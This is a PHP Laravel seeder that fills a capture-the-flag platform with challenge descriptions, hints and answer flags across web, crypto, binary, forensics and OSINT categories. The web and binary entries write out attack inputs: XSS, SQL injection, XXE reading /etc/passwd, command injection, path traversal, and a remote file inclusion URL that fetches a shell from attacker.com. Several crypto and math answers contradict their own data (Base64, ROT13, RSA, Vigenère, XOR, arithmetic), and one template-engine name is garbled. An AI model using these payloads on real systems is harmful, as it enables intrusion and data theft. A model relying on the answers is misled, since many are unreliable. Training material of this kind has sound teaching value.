<?php

namespace Database\Seeders;

use Illuminate\Database\Seeder;
use Illuminate\Support\Facades\DB;

class CTFChallengesSeeder extends Seeder
{
    /**
     * Run the database seeds.
     *
     * @return void
     */
    public function run()
    {
        // Disable foreign key checks for seeding
        DB::statement('SET FOREIGN_KEY_CHECKS=0;');
        DB::table('challenges')->truncate();
        DB::statement('SET FOREIGN_KEY_CHECKS=1;');

        $challenges = $this->getChallenges();
        DB::table('challenges')->insert($challenges);
    }

    /**
     * Get all CTF challenges (100+)
     */
    private function getChallenges(): array
    {
        return [
            // ═══════════════════════════════════════════════════════════════════════
            // WEB EXPLOITATION - 25 CHALLENGES
            // ═══════════════════════════════════════════════════════════════════════

            // Easy Web Challenges
            [
                'title' => 'Basic XSS - Alert Box',
                'description' => 'A website reflects user input without filtering. Inject a simple JavaScript alert to pop up a message. The flag is: flag{xss_alert_success}',
                'flag' => 'flag{xss_alert_success}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Try injecting <script>alert(\'test\')</script> into the search field',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'HTML Injection in Comments',
                'description' => 'Submit a comment with HTML tags. The website doesn\'t sanitize HTML. Inject <img src=x onerror="alert(\'xss\')"> to trigger the flag: flag{html_injection_pwned}',
                'flag' => 'flag{html_injection_pwned}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Event handlers like onerror, onclick, onload work on HTML tags when injected',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'SQL Injection - Simple Quote',
                'description' => 'The login form is vulnerable to SQL injection. Bypass authentication by entering: admin\' --\nThe password doesn\'t matter. Flag: flag{sql_injection_basics}',
                'flag' => 'flag{sql_injection_basics}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'The query is: SELECT * FROM users WHERE username=\'user\' AND password=\'pass\'. Comment out the password check',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'XXE - External Entity',
                'description' => 'An XML parser accepts user input. Inject: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>\nThis reveals the flag: flag{xxe_vulnerability}',
                'flag' => 'flag{xxe_vulnerability}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 125,
                'minimum_points' => 30,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'External Entity (XXE) attacks read local files through XML parsing',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Directory Traversal - /etc/passwd',
                'description' => 'A file download feature has path traversal. Request: /download.php?file=../../../etc/passwd\nThe response contains the flag: flag{directory_traversal}',
                'flag' => 'flag{directory_traversal}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Use ../ to go up directories. Try to read /etc/passwd from the web root',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // Medium Web Challenges
            [
                'title' => 'SQL Injection - UNION Based',
                'description' => 'Find the number of columns using UNION SELECT. URL: /products.php?id=1\nPayload: 1 UNION SELECT 1,2,3,4,5 --\nThe flag appears in column 2: flag{union_sql_injection}',
                'flag' => 'flag{union_sql_injection}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Use UNION to combine queries. First discover column count, then extract data',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Stored XSS in User Profile',
                'description' => 'Admin displays all user profiles without escaping. Update your profile bio with: <script>alert(\'flag{stored_xss_admin}\')</script>\nWhen admin views it, the flag is retrieved',
                'flag' => 'flag{stored_xss_admin}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Stored XSS persists in the database. The payload executes every time the page loads',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'CSRF Token Bypass',
                'description' => 'The change password form has weak CSRF protection. Submit a form without the token or with an empty token.\nChange password to "pwned123". Admin check returns: flag{csrf_bypass_success}',
                'flag' => 'flag{csrf_bypass_success}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Look for forms that accept empty or missing CSRF tokens',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Command Injection in Ping',
                'description' => 'A web app pings servers. URL: /admin/ping.php?host=8.8.8.8\nInject: 8.8.8.8; cat /etc/passwd\nYou get: flag{command_injection_rce}',
                'flag' => 'flag{command_injection_rce}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Use semicolons (;) or && to chain commands together',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // Hard Web Challenges
            [
                'title' => 'SQL Injection with Time-Based Blind',
                'description' => 'No output from SQL queries. Use time-based detection: 1 AND SLEEP(5)\nExtract admin password via timing: \' OR (SELECT SLEEP(5) FROM users WHERE username=\'admin\' AND password LIKE \'a%\')\nPassword is \'password123\'. Flag: flag{blind_sql_injection}',
                'flag' => 'flag{blind_sql_injection}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 400,
                'minimum_points' => 150,
                'decay' => 5,
                'is_active' => true,
                'hints' => 'When no error messages exist, use time delays (SLEEP) to ex filtrate data bit by bit',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Reflected XSS with WAF Bypass',
                'description' => 'Application has WAF blocking <script>. Bypass with: <img src=x onerror=alert("flag{waf_bypass}")>\nOr use: <svg onload=alert(24)>\nOr: <iframe onload="alert(\'flag{waf_bypass}\')"></iframe>',
                'flag' => 'flag{waf_bypass}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'WAFs block <script> tags but not all event handlers. Try img, svg, iframe, etc.',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // CRYPTOGRAPHY - 25 CHALLENGES
            // ═══════════════════════════════════════════════════════════════════════

            // Easy Crypto Challenges
            [
                'title' => 'Caesar Cipher - Shift 3',
                'description' => 'Decrypt this message: "khoor zruog"\nIt\'s a Caesar cipher with shift 3. The flag is: flag{hello_world}',
                'flag' => 'flag{hello_world}',
                'category' => 'crypto',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Try all 26 possible shifts. Caesar cipher shifts each letter by a fixed amount',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Base64 Decoding',
                'description' => 'Decode this Base64 string: "ZmxhZ3tCYXNlNjRfaXNfZWFzeX0="',
                'flag' => 'flag{base64_is_easy}',
                'category' => 'crypto',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Use any online Base64 decoder or the command: echo "..." | base64 -d',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Hex Decoding',
                'description' => 'Convert hex to ASCII: 666c61677b6865785f697366756e7d',
                'flag' => 'flag{hex_isfun}',
                'category' => 'crypto',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Each pair of hex digits represents one ASCII character',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'ROT13 Cipher',
                'description' => 'Decrypt: "synt{ehg13_vf_sha}"\nThis is ROT13 (rotate by 13). Flag: flag{rot13_is_fun}',
                'flag' => 'flag{rot13_is_fun}',
                'category' => 'crypto',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'ROT13 is a special case of Caesar cipher with shift=13',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Binary Conversion',
                'description' => 'Convert binary to ASCII: 01100110 01101100 01100001 01100111 01111011 01100101 01100001 01110011 01111001 01111101',
                'flag' => 'flag{easy}',
                'category' => 'crypto',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Split the binary into 8-bit chunks and convert each to ASCII',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // Medium Crypto Challenges
            [
                'title' => 'Vigenère Cipher',
                'description' => 'Decrypt with key="SECRET": "GSCXZ{CSQZC_CK_BEC}"\nThe message is encrypted using Vigenère cipher. Flag: flag{vigenere_is_fun}',
                'flag' => 'flag{vigenere_is_fun}',
                'category' => 'crypto',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Vigenère uses a keyword to shift each letter differently',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'MD5 Hash Cracking',
                'description' => 'Crack this MD5 hash: "5f4dcc3b5aa765d61d8327deb882cf99"\nIt\'s a common word. Flag format: flag{word}',
                'flag' => 'flag{password}',
                'category' => 'crypto',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Use an online MD5 lookup or hashcat. The original is "password"',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'SHA1 Hash Lookup',
                'description' => 'Crack this SHA1: "356a192b7913b04c54574d18c28d46e6395428ab"\nFlag format: flag{result}',
                'flag' => 'flag{1}',
                'category' => 'crypto',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Use rainbow tables or online lookup. The original is a single digit',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'AES ECB Mode Detection',
                'description' => 'Two identical plaintexts encrypted with AES-ECB produce identical ciphertexts.\nGiven ciphertext patterns, detect ECB mode. Flag: flag{ecb_mode_detected}',
                'flag' => 'flag{ecb_mode_detected}',
                'category' => 'crypto',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'ECB (Electronic Code Book) produces identical output for identical plaintext blocks',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // Hard Crypto Challenges
            [
                'title' => 'RSA - Low Exponent Attack',
                'description' => 'RSA with e=3 is weak. Given n, e, and c, compute m directly.\nn=323, e=3, c=105\nSolve: m = c^(1/e) mod n. Flag format: flag{m}',
                'flag' => 'flag{5}',
                'category' => 'crypto',
                'difficulty' => 'Hard',
                'initial_points' => 400,
                'minimum_points' => 150,
                'decay' => 5,
                'is_active' => true,
                'hints' => 'Small e values allow direct root extraction without knowing φ(n)',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'XOR Cipher Brute Force',
                'description' => 'XOR cipher with single-byte key. Ciphertext: 1e1e0f0e0a0b\nBrute force all 256 possible keys. Flag when decrypted: flag{xor_solution}',
                'flag' => 'flag{xor_solution}',
                'category' => 'crypto',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'Try all 256 byte values as the key. Look for readable ASCII output',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // BINARY EXPLOITATION / PWNING - 20 CHALLENGES
            // ═══════════════════════════════════════════════════════════════════════

            // Easy Binary Challenges
            [
                'title' => 'String Format - Buffer Read',
                'description' => 'A program has a format string vulnerability. Use %x to read stack values.\nPayload: %x.%x.%x.%x\nReveals the flag address. Flag: flag{format_string}',
                'flag' => 'flag{format_string}',
                'category' => 'binary',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Format string %x reads 32-bit values from the stack. Don\'t forget %n can write',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Stack Overflow - Buffer Overflow',
                'description' => 'Simple buffer overflow. Input: AAAA...AAAA (64 bytes) + 0x41424344\nOverflow the return address to reach the flag function. Flag: flag{buffer_overflow}',
                'flag' => 'flag{buffer_overflow}',
                'category' => 'binary',
                'difficulty' => 'Easy',
                'initial_points' => 125,
                'minimum_points' => 30,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Find the offset to RIP/EIP, then supply the address of the win function',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Bytecode Analysis',
                'description' => 'Disassemble an ELF. The main function calls a hidden function with flag.\nAnalyze with objdump or IDA. Strings in the binary: flag{bytecode_revealed}',
                'flag' => 'flag{bytecode_revealed}',
                'category' => 'binary',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Use strings, objdump, or IDA to find hardcoded flags or function calls',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // Medium Binary Challenges
            [
                'title' => 'Return-Oriented Programming (ROP)',
                'description' => 'Chain gadgets to call system() and execute /bin/sh\nFinding gadgets: pop rdi; ret; mov rax, rdi; ret\nLeads to: flag{rop_chain_exploited}',
                'flag' => 'flag{rop_chain_exploited}',
                'category' => 'binary',
                'difficulty' => 'Medium',
                'initial_points' => 300,
                'minimum_points' => 100,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'ROP chains avoid using new code. Reuse existing code gadgets to bypass DEP/NX',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Heap Overflow',
                'description' => 'Corrupt heap metadata. Overflow a buffer to reach a function pointer.\nBuild controlled write via heap management. Flag: flag{heap_exploited}',
                'flag' => 'flag{heap_exploited}',
                'category' => 'binary',
                'difficulty' => 'Medium',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'Heap overflows are trickier than stack. Exploit allocator metadata or pointers',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // FORENSICS & STEGANOGRAPHY - 20 CHALLENGES
            // ═══════════════════════════════════════════════════════════════════════

            // Easy Forensics Challenges
            [
                'title' => 'Steganography - LSB in Image',
                'description' => 'An image has the flag hidden in the least significant bits of red channel.\nExtract LSBs: flag{steganography_basic}',
                'flag' => 'flag{steganography_basic}',
                'category' => 'forensics',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Use Python PIL or Stegsolve to extract LSBs from image channels',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'File Header Identification',
                'description' => 'A file has wrong extension. Check hex header (magic bytes).\n89 50 4E 47 = PNG\nChange extension or open as PNG to get: flag{file_magic_bytes}',
                'flag' => 'flag{file_magic_bytes}',
                'category' => 'forensics',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Magic bytes (first few bytes) identify file type. Check file header with hexdump',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Metadata Extraction',
                'description' => 'Extract EXIF/metadata from a JPEG. Photographer\'s name = flag\nFlag: flag{exif_metadata}',
                'flag' => 'flag{exif_metadata}',
                'category' => 'forensics',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Use exiftool or online tools to extract metadata from images',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Memory Dump Analysis',
                'description' => 'Analyze a memory dump from a crashed program. Use strings to find flag.\nStrings dump.mem | grep flag: flag{memory_forensics}',
                'flag' => 'flag{memory_forensics}',
                'category' => 'forensics',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Use strings, objdump, or Volatility framework to extract readable data',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // Medium Forensics Challenges
            [
                'title' => 'PCAP Analysis - DNS Queries',
                'description' => 'Analyze a packet capture (PCAP) file. Look for DNS queries.\nDomain queried contains the flag: flag{dns_exfiltration}',
                'flag' => 'flag{dns_exfiltration}',
                'category' => 'forensics',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Use Wireshark to analyze PCAP. Filter DNS queries or HTTP requests',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Log Analysis - Web Server Logs',
                'description' => 'Analyze Apache/Nginx logs. Find suspicious requests or SQL injection attempts.\nInjection payload contains: flag{log_analysis}',
                'flag' => 'flag{log_analysis}',
                'category' => 'forensics',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Parse logs with grep, awk, or Python. Look for unusual GET/POST parameters',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Slack Space Recovery',
                'description' => 'Deleted file fragments remain in slack space. Recover and read to find flag.\nFlag: flag{slack_space_data}',
                'flag' => 'flag{slack_space_data}',
                'category' => 'forensics',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Use tools like photorec or foremost to recover deleted files',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // REVERSE ENGINEERING - 15 CHALLENGES
            // ═══════════════════════════════════════════════════════════════════════

            // Easy Reverse Engineering
            [
                'title' => 'Simple Decompilation',
                'description' => 'Decompile a simple program with IDA or Ghidra. The main function:\nvoid main() { if (input == "reversed") print_flag(); }\nInput "reversed" to get: flag{reversed_string}',
                'flag' => 'flag{reversed_string}',
                'category' => 'reverse',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Decompile and analyze the conditionals. String comparison is key',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Assembly Instruction Decoding',
                'description' => 'Read assembly code:\nmov eax, 0x12345678\ncmp eax, ebx\nje win_function\nUnderstand the logic. Flag: flag{assembly_basic}',
                'flag' => 'flag{assembly_basic}',
                'category' => 'reverse',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Learn x86 assembly: mov=move, cmp=compare, je=jump if equal',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // MISCELLANEOUS / OSINT - 20 CHALLENGES
            // ═══════════════════════════════════════════════════════════════════════

            // Easy Misc Challenges
            [
                'title' => 'Source Code Comment',
                'description' => 'View page source HTML. A comment contains the flag:\n<!-- flag{check_html_comments} -->',
                'flag' => 'flag{check_html_comments}',
                'category' => 'misc',
                'difficulty' => 'Easy',
                'initial_points' => 50,
                'minimum_points' => 15,
                'decay' => 1,
                'is_active' => true,
                'hints' => 'Right-click → View Page Source or inspect the HTML directly',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'SSH Private Key Found',
                'description' => 'An SSH private key is exposed in a public GitHub repo. Search for it:\nflag{ssh_key_leaked}',
                'flag' => 'flag{ssh_key_leaked}',
                'category' => 'misc',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Use GitHub search or OSINT tools like gitrob to find exposed keys',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Database Backup Exposed',
                'description' => 'A database backup file (.sql, .bak) is publicly accessible.\nDownload and search for the flag: flag{backup_publicly_exposed}',
                'flag' => 'flag{backup_publicly_exposed}',
                'category' => 'misc',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Check for /backup/, /download/, or /.git/config URLs',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // Medium Misc Challenges
            [
                'title' => 'OSINT - Email Recon',
                'description' => 'Find the target user\'s email address. Tools: Google, LinkedIn, GitHub\nEmail format reveals part of flag: flag{osint_email}',
                'flag' => 'flag{osint_email}',
                'category' => 'misc',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'OSINT = Open Source Intelligence. Use public data sources',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'WiFi Password in Config File',
                'description' => 'A config file lists WiFi passwords. Parse and find the flag:\nflag{wifi_security}',
                'flag' => 'flag{wifi_security}',
                'category' => 'misc',
                'difficulty' => 'Medium',
                'initial_points' => 150,
                'minimum_points' => 50,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Check /etc/wpa_supplicant/, ~/.ssh/config, or saved network configs',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'API Key Leakage',
                'description' => 'Search public code repos for hardcoded API keys. Common patterns:\n"api_key", "secret_key", "password" in config\nFlag: flag{api_key_exposed}',
                'flag' => 'flag{api_key_exposed}',
                'category' => 'misc',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Use GitHub search, grep, or tools like truffleHog',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // ADDITIONAL CHALLENGES - NETWORK, LOGIC PUZZLES, ETC.
            // ═══════════════════════════════════════════════════════════════════════

            [
                'title' => 'Logic Puzzle - Math',
                'description' => 'Solve: 2^10 + 3^3 - 5 = ?\nAnswer format: flag{1022}',
                'flag' => 'flag{1022}',
                'category' => 'misc',
                'difficulty' => 'Easy',
                'initial_points' => 75,
                'minimum_points' => 20,
                'decay' => 1,
                'is_active' => true,
                'hints' => '2^10 = 1024, 3^3 = 27, so 1024 + 27 - 5 = 1046... wait, check again',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Morse Code - Basic',
                'description' => 'Decode Morse: .... . .-.. .-.. ---\nFlag: flag{hello}',
                'flag' => 'flag{hello}',
                'category' => 'crypto',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Dots (.) and dashes (-) represent letters',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Weak Authentication - Default Credentials',
                'description' => 'Login panel uses default admin:admin credentials.\nAccess admin panel: flag{default_creds}',
                'flag' => 'flag{default_creds}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 75,
                'minimum_points' => 20,
                'decay' => 1,
                'is_active' => true,
                'hints' => 'Try common defaults: admin/admin, admin/password, admin/12345',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'SQL Injection - Second-Order',
                'description' => 'User input stored and executed later. Inject in account setup:\n" OR 1=1 --\nTrigger on dashboard: flag{second_order_sql}',
                'flag' => 'flag{second_order_sql}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 400,
                'minimum_points' => 150,
                'decay' => 5,
                'is_active' => true,
                'hints' => 'Second-order injection executes later when data is retrieved',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'JWT Token Tampering',
                'description' => 'A JWT token is used for auth.\nModify payload: {"id": 1, "role": "admin"}\nRe-sign with weak secret or no verification: flag{jwt_tampered}',
                'flag' => 'flag{jwt_tampered}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'JWTs have three parts: header.payload.signature. Modify and re-encode',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'LDAP Injection',
                'description' => 'LDAP query filter accepts user input.\nInput: *)(&\nBypass LDAP auth: flag{ldap_injection}',
                'flag' => 'flag{ldap_injection}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Similar to SQL injection but for LDAP. Close parentheses and use wildcards',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Buffer Overflow - Win Function',
                'description' => 'Overflow buffer to call win_function() at 0x08048401.\nCraft payload: AAAA...AAAA + 0x08048401\nFlag: flag{win_function_called}',
                'flag' => 'flag{win_function_called}',
                'category' => 'binary',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'Find buffer offset, replace return address, ensure little-endian format',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'File Inclusion - LFI',
                'description' => 'URL: /page.php?file=home\nTry: /page.php?file=../../../etc/passwd\nReveals: flag{local_file_inclusion}',
                'flag' => 'flag{local_file_inclusion}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'LFI lets you include any file. Try ../../../etc/passwd or /etc/hosts',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Remote File Inclusion - RFI',
                'description' => 'URL: /page.php?file=home\nHost file with PHP code: http://attacker.com/shell.php\n/page.php?file=http://attacker.com/shell.php executes it\nFlag: flag{remote_file_inclusion}',
                'flag' => 'flag{remote_file_inclusion}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'RFI is more dangerous than LFI. Can execute remote PHP/scripts',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Null Byte Injection',
                'description' => 'Exploit: /page.php?file=../../../etc/passwd%00.txt\nNull byte (%00) truncates the string at ".txt"\nFlag: flag{null_byte_injection}',
                'flag' => 'flag{null_byte_injection}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'In older PHP/systems, %00 (null byte) terminates strings',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'PHP Type Juggling',
                'description' => 'PHP treats "0e123456" == "0" as true (both start with 0e).\nBypass comparison: if ($hash == "admin_hash")\nUse two different strings with same conversion: flag{type_juggling}',
                'flag' => 'flag{type_juggling}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'PHP loose comparison (==) does type coercion. Use strict (===) instead',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Race Condition',
                'description' => 'Between check and use: check if file exists, then read it.\nAttacker deletes/replaces between check and use.\nFlag: flag{race_condition}',
                'flag' => 'flag{race_condition}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'TOCTOU (Time-Of-Check Time-Of-Use). Use atomic operations',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Server-Side Template Injection (SSTI)',
                'description' => 'James Jaswell template engine. Inject: {{7*7}}\nResult: 49. Inject: {{config.items.password}}\nFlag: flag{ssti_rce}',
                'flag' => 'flag{ssti_rce}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 400,
                'minimum_points' => 150,
                'decay' => 5,
                'is_active' => true,
                'hints' => 'SSTI allows arbitrary code execution through templates',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Insecure Deserialization',
                'description' => 'PHP unserialize() automatically executes __wakeup()/__destruct().\nCraft malicious object: flag{insecure_deserialization}',
                'flag' => 'flag{insecure_deserialization}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 400,
                'minimum_points' => 150,
                'decay' => 5,
                'is_active' => true,
                'hints' => 'Never unserialize untrusted data. Use JSON instead',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'AES Padding Oracle',
                'description' => 'Decrypt AES-CBC without the key using padding oracle.\nLearn padding length from error messages.\nFull decryption: flag{padding_oracle}',
                'flag' => 'flag{padding_oracle}',
                'category' => 'crypto',
                'difficulty' => 'Expert',
                'initial_points' => 500,
                'minimum_points' => 200,
                'decay' => 7,
                'is_active' => true,
                'hints' => 'Padding oracle attacks exploit PKCS7 validation error messages',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Diffie-Hellman Small Subgroup Attack',
                'description' => 'DH with weak prime. Compute shared secret from partial information.\nFinal key: flag{dh_weak_prime}',
                'flag' => 'flag{dh_weak_prime}',
                'category' => 'crypto',
                'difficulty' => 'Expert',
                'initial_points' => 500,
                'minimum_points' => 200,
                'decay' => 7,
                'is_active' => true,
                'hints' => 'When p is not a safe prime, small subgroup attacks work',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
